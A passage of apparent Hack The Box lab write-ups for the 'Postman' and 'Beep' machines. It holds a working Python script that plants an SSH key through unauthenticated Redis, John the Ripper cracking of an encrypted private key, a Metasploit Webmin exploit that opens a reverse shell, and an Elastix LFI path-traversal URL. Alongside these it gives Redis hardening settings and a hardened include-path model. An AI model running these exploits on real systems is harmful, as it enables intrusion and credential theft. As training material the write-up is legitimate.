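    puts on the wire: *<argc>\\r\\n, then $<len>\\r\\n<arg>\\r\\n per argument."""
    out = [b"*%d\r\n" % len(args)]
    for arg in args:
        raw = arg if isinstance(arg, bytes) else str(arg).encode()
        out.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(out)


def resp_reply_ok(reply):
    """SET, CONFIG SET and SAVE answer with the simple string +OK; a reply starting
    with '-' is an error, e.g. -ERR Changing directory: No such file or directory."""
    return reply.startswith(b"+OK")


def pad_pubkey(pubkey_line):
    """SAVE writes an RDB file: binary header, our value, binary trailer. sshd skips
    lines it cannot parse, so blank lines on both sides guarantee the key lands on
    a line of its own inside authorized_keys."""
    return b"\n\n" + pubkey_line.strip().encode() + b"\n\n"


def build_exchange(pubkey_line, ssh_dir="/var/lib/redis/.ssh"):
    """The client side of the exchange used above, in order."""
    return [
        resp_encode("SET", "pubkey", pad_pubkey(pubkey_line)),
        resp_encode("CONFIG", "SET", "dir", ssh_dir),
        resp_encode("CONFIG", "SET", "dbfilename", "authorized_keys"),
        resp_encode("SAVE"),
    ]


def plant_key(host, pubkey_line, port=6379, ssh_dir="/var/lib/redis/.ssh"):
    """Send the exchange to a live, unauthenticated Redis and stop at the first
    reply that is not +OK. Returns True when all four commands were accepted."""
    with socket.create_connection((host, port), timeout=5) as sock:
        for cmd in build_exchange(pubkey_line, ssh_dir):
            sock.sendall(cmd)
            reply = sock.recv(4096)
            if not resp_reply_ok(reply):
                print("server said:", reply.decode(errors="replace").strip())
                return False
    return True


if __name__ == "__main__":
    # usage: python3 plant_key.py <host> <path to id_rsa.pub> [ssh dir]
    host, pub_path = sys.argv[1], sys.argv[2]
    ssh_dir = sys.argv[3] if len(sys.argv) > 3 else "/var/lib/redis/.ssh"
    with open(pub_path) as fh:
        key = fh.read()
    print("planted" if plant_key(host, key, ssh_dir=ssh_dir) else "failed")
```

The preconditions are visible in the walkthrough: the redis user has a real login shell (/bin/bash in /etc/passwd), and a .ssh directory exists under its home and is writable by the service. On the defensive side, any one of bind 127.0.0.1, protected-mode yes, requirepass, or rename-command CONFIG "" in redis.conf would have stopped this chain.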

Now we can SSH into the server as the user redis.
However, there is no “user.txt” in the home directory of the redis user.

root@kali:~# ssh redis@10.10.10.160
The authenticity of host '10.10.10.160 (10.10.10.160)' can't be established.
ECDSA key fingerprint is SHA256:kea9iwskZTAT66U8yNRQiTa6t35LX8p0jOpTfvgeCh0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.160' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$ id
uid=107(redis) gid=114(redis) groups=114(redis)
redis@Postman:~$ 

With some enumeration, we can find an interesting file “id_rsa.bak” in the “/opt” directory.

redis@Postman:~$ ls /opt/
id_rsa.bak

redis@Postman:~$ cat /opt/id_rsa.bak 
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
(encrypted key body omitted)
-----END RSA PRIVATE KEY-----
redis@Postman:~$ 

Try to download with scp.

root@kali:~# scp redis@10.10.10.160:/opt/id_rsa.bak /root
id_rsa.bak                                                        100% 1743    38.3KB/s   00:00    
root@kali:~# 

The key is encrypted (Proc-Type: 4,ENCRYPTED), so its passphrase can be brute-forced with John the Ripper.
First the private key has to be converted into a hash format John understands, which is what ssh2john.py does.
Cracking with “rockyou.txt” yields the passphrase “computer2008”; whose key it is we find out next.

root@kali:~# /usr/share/john/ssh2john.py id_rsa.bak > hash.txt

root@kali:~# john hash.txt -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (id_rsa.bak)
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:06 DONE (2020-03-15 10:55) 0.1468g/s 2105Kp/s 2105Kc/s 2105KC/sa6_123..*7¡Vamos!
Session completed

Looking at /etc/passwd, the only account with a login shell besides redis is “Matt”, so the key is most likely his.
SSH as Matt is refused, but the passphrase is reused as Matt's account password, so su works.

redis@Postman:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
Matt:x:1000:1000:,,,:/home/Matt:/bin/bash
redis:x:107:114::/var/lib/redis:/bin/bash

redis@Postman:~$ su Matt
Password: 
Matt@Postman:/var/lib/redis$ 

The user.txt is in the home directory of user “Matt”.

Matt@Postman:~$ pwd
/home/Matt

Matt@Postman:~$ cat user.txt 
517ad0ec2458ca97af8d93aac08a2f3c

3. Getting Root

One service remains that we have not looked at: Webmin on port 10000.

For the privilege escalation, we can try Matt's credential again.
It is accepted by the Webmin login as well.

Matt:computer2008

Also, we can search for known vulnerabilities in Webmin 1.910 with searchsploit.

root@kali:~# searchsploit webmin
-------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                            |  Path
                                                                          | (/usr/share/exploitdb/)
-------------------------------------------------------------------------- ----------------------------------------
DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal           | exploits/cgi/webapps/23535.txt
Webmin - Brute Force / Command Execution                                  | exploits/multiple/remote/705.pl
Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Spoofing               | exploits/linux/remote/22275.pl
Webmin 0.x - 'RPC' Privilege Escalation                                   | exploits/linux/remote/21765.pl
Webmin 0.x - Code Input Validation                                        | exploits/linux/local/21348.txt
Webmin 1.5 - Brute Force / Command Execution                              | exploits/multiple/remote/746.pl
Webmin 1.5 - Web Brute Force (CGI)                                        | exploits/multiple/remote/745.pl
Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit)     | exploits/unix/remote/21851.rb
Webmin 1.850 - Multiple Vulnerabilities                                   | exploits/cgi/webapps/42989.txt
Webmin 1.900 - Remote Command Execution (Metasploit)                      | exploits/cgi/remote/46201.rb
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)    | exploits/linux/remote/46984.rb
Webmin 1.920 - Remote Code Execution                                      | exploits/linux/webapps/47293.sh
Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)         | exploits/linux/remote/47230.rb
Webmin 1.x - HTML Email Command Execution                                 | exploits/cgi/webapps/24574.txt
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP)        | exploits/multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)       | exploits/multiple/remote/2017.pl
phpMyWebmin 1.0 - 'target' Remote File Inclusion                          | exploits/php/webapps/2462.txt
phpMyWebmin 1.0 - 'window.php' Remote File Inclusion                      | exploits/php/webapps/2451.txt
webmin 0.91 - Directory Traversal                                         | exploits/cgi/remote/21183.txt
-------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

For Webmin 1.910, there is an authenticated “Package Updates” remote command execution (CVE-2019-12840), available as a Metasploit module.
Because Webmin runs as root, exploiting it with Matt's username and password gives a root shell directly.
The usual python pty trick then upgrades it to an interactive shell.

msf5 > use exploit/linux/http/webmin_packageup_rce 
msf5 exploit(linux/http/webmin_packageup_rce) > set username Matt
username => Matt
msf5 exploit(linux/http/webmin_packageup_rce) > set password computer2008
password => computer2008
msf5 exploit(linux/http/webmin_packageup_rce) > set rhosts 10.10.10.160
rhosts => 10.10.10.160
msf5 exploit(linux/http/webmin_packageup_rce) > set lhost 10.10.14.9
lhost => 10.10.14.9
msf5 exploit(linux/http/webmin_packageup_rce) > set ssl true
ssl => true
msf5 exploit(linux/http/webmin_packageup_rce) > run

[*] Started reverse TCP handler on 10.10.14.9:4444 
[+] Session cookie: 28319cb492d25d1493cbd8a83f732ca8
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.9:4444 -> 10.10.10.160:49658) at 2020-03-16 18:56:54 +0200
id

uid=0(root) gid=0(root) groups=0(root)
python -c "import pty;pty.spawn('/bin/bash')"
root@Postman:/usr/share/webmin/package-updates/# 

As always, root.txt is in the directory “/root”.

root@Postman:~# pwd
pwd
/root

root@Postman:~# cat root.txt
cat root.txt
a257741c5bed8be7778c6ed95686ddce
root@Postman:~# 

Hackthebox Beep Walkthrough


Explanation

Hackthebox is a website that hosts a collection of vulnerable machines inside its own VPN.
This is a walkthrough of the box “Beep”.

Solution

1. Initial Enumeration

TCP Port Scanning:

root@kali:~# nmap -p- 10.10.10.7 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-01 09:55 EET
Nmap scan report for 10.10.10.7
Host is up (0.044s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: AUTH-RESP-CODE UIDL STLS EXPIRE(NEVER) APOP TOP IMPLEMENTATION(Cyrus POP3 server v2) PIPELINING RESP-CODES USER LOGIN-DELAY(0)
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: ATOMIC LITERAL+ CATENATE ANNOTATEMORE OK CHILDREN IDLE X-NETSCAPE MULTIAPPEND UIDPLUS ID MAILBOX-REFERRALS IMAP4rev1 NAMESPACE LIST-SUBSCRIBED LISTEXT URLAUTHA0001 CONDSTORE UNSELECT Completed SORT=MODSEQ THREAD=ORDEREDSUBJECT THREAD=REFERENCES BINARY SORT RIGHTS=kxte NO STARTTLS RENAME QUOTA IMAP4 ACL
443/tcp   open  ssl/https?
|_ssl-date: 2020-03-01T09:01:11+00:00; +1h02m01s from scanner time.
880/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

Host script results:
|_clock-skew: 1h02m00s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 382.63 seconds

root@kali:~#

Gobuster HTTP:

root@kali:~# gobuster dir -u http://10.10.10.7/ -x php -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.7/
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/03/01 10:04:30 Starting gobuster
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.10.7/23b3f8d9-6290-4f1e-85a5-9a8041a56e20 => 302. To force processing of Wildcard responses, specify the '--wildcard' switch

root@kali:~# 

Gobuster HTTPS:

root@kali:~# gobuster dir -u https://10.10.10.7/ -k -x php -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.7/
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/03/01 10:12:31 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.php (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/admin (Status: 301)
/cgi-bin/ (Status: 403)
/config.php (Status: 200)
/configs (Status: 301)
/favicon.ico (Status: 200)
/help (Status: 301)
/images (Status: 301)
/index.php (Status: 200)
/index.php (Status: 200)
/lang (Status: 301)
/libs (Status: 301)
/mail (Status: 301)
/modules (Status: 301)
/panel (Status: 301)
/register.php (Status: 200)
/robots.txt (Status: 200)
/static (Status: 301)
/themes (Status: 301)
/var (Status: 301)
===============================================================
2020/03/01 10:15:22 Finished
===============================================================

root@kali:~# 

2. Getting Root

On port 443 we find the Elastix login page. placeholder

We can look up known Elastix vulnerabilities with searchsploit.

root@kali:~# searchsploit elastix
----------------------------------------------------------- ----------------------------------------
 Exploit Title                                             |  Path
                                                           | (/usr/share/exploitdb/)
----------------------------------------------------------- ----------------------------------------
Elastix - 'page' Cross-Site Scripting                      | exploits/php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities    | exploits/php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilit | exploits/php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion           | exploits/php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection                          | exploits/php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection                         | exploits/php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution     | exploits/php/webapps/18650.py
----------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

This time we use “Elastix 2.2.0 - ‘graph.php’ Local File Inclusion”. placeholder

According to that exploit entry, requesting the following URL triggers the LFI and returns the contents of /etc/amportal.conf.

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

placeholder

Grepping the output for “password” turns up an interesting parameter. placeholder

This gives us the following password.
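As an added illustration (not Elastix or vtigercrm code), the vulnerable pattern behind this LFI next to a hardened version: LANG_DIR, the allow-list and the NUL-truncation helper are assumptions modelling how graph.php built an include path from current_language, and the trailing %00 in the walkthrough's URL is what cut off the suffix the script appended.

```python
import os
import urllib.parse

# Constructed model of the graph.php include, not Elastix/vtigercrm code.
# LANG_DIR and the allow-list are assumptions made for this example.
LANG_DIR = "/var/www/html/vtigercrm/include/language"
ALLOWED_LANGUAGES = {"en_us", "es_es", "de_de"}

# The payload from the walkthrough, as it arrives in the query string.
PAYLOAD = "../../../../../../../..//etc/amportal.conf%00"


def php_style_truncate(path: str) -> str:
    """Model the NUL-byte truncation that old PHP include() calls applied."""
    return path.split("\x00", 1)[0]


def include_path_vulnerable(current_language: str) -> str:
    """The vulnerable pattern: decoded user input concatenated into the path."""
    lang = urllib.parse.unquote(current_language)
    raw = os.path.join(LANG_DIR, lang + ".lang.php")
    return php_style_truncate(os.path.normpath(raw))


def include_path_hardened(current_language: str):
    """Return the include path only for an allow-listed language code,
    otherwise None. The decoded value is checked against the allow-list,
    so traversal, NUL bytes and absolute paths never reach the filesystem."""
    lang = urllib.parse.unquote(current_language)
    if "\x00" in lang or lang not in ALLOWED_LANGUAGES:
        return None
    target = os.path.normpath(os.path.join(LANG_DIR, lang + ".lang.php"))
    # Defence in depth: the resolved path must still sit below LANG_DIR.
    if os.path.commonpath([LANG_DIR, target]) != LANG_DIR:
        return None
    return target


if __name__ == "__main__":
    print(include_path_vulnerable(PAYLOAD))   # /etc/amportal.conf
    print(include_path_hardened(PAYLOAD))     # None
    print(include_path_hardened("en_us"))
```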

jEhdIekWmdjE

This same password also works for root over SSH.
As always, root.txt is in the directory “/root”.

root@kali:~# ssh root@10.10.10.7
root@10.10.10.7's password: 
Last login: Sun Mar  1 19:45:39 2020 from 10.10.14.27

Welcome to Elastix 
----------------------------------------------------

To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7

[root@beep ~]# cat /root/root.txt 
d88e006123842106982acce0aaf453f0

[root@beep ~]#